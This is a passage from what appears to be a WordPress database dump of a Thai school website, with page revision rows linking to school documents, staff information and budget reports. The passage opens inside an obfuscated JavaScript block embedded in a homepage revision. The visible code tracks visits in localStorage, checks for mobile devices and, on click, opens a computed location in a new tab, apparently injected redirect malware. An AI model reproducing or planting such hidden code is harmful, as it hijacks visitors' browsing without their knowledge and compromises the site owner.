_0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 14:22:59','2024-08-30 07:22:59','',19,'http://watprato.ssk.in.th/?p=345',0,'revision','',0),
(346,2,'2024-08-30 14:26:52','2024-08-30 07:26:52','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" 